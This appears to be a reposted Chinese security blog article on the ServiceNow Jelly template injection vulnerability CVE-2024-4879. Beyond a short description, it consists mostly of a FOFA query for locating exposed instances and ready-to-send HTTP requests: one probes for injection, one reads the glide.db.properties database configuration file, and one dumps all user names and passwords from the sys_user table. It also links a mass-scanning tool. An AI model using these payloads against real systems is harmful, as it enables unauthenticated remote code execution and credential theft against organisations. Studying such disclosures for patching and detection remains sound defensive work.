ServiceNow-UI存在Jelly模板注入漏洞(CVE-2024-4879)
ServiceNow是一家提供企业级云计算服务的公司,其产品是一种基于云的服务管理解决方案,旨在帮助组织简化和自动化业务流程。ServiceNow的平台提供了各种功能,包括IT服务管理、IT运营管理、IT业务管理、客户服务管理、人力资源服务管理等,帮助企业提高效率、降低成本并提升服务质量。由于输入验证不严格,ServiceNow中的Jelly模板和Glide表达式存在注入漏洞,未经身份验证的攻击者可以通过构造恶意请求来利用这些漏洞,从而实现远程代码执行。
fofa
app="servicenow-Products"
poc
GET /login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(7*7);</g:evaluate></j:jelly></style> HTTP/1.1
Host:
读取数据库配置文件
GET /login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly:core" xmlns:g='glide'><g:evaluate>z=new Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style> HTTP/1.1
Host:
读取密码
/login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gr=new GlideRecord("sys_user");gr.query();s="";while(gr.next())s=s.concat(gr.user_name," : ",gr.user_password,"<br/>");gs.addErrorMessage(s);</g:evaluate></j:jelly></style>
ServiceNow CVE-2024-4879漏洞的批量扫描工具。
该工具专为批量扫描ServiceNow CVE-2024-4879漏洞而设计。它的灵感来自Assetnote安全研究,该研究详细涵盖了最近的ServiceNow CVE-2024-4879、CVE-2024-5178和CVE-2024-5217漏洞。
https://github.com/bigb0x/CVE-2024-4879
漏洞来源
- • https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data
原文始发于微信公众号(乌雲安全):CVE-2024-4879 POC&批量扫描工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论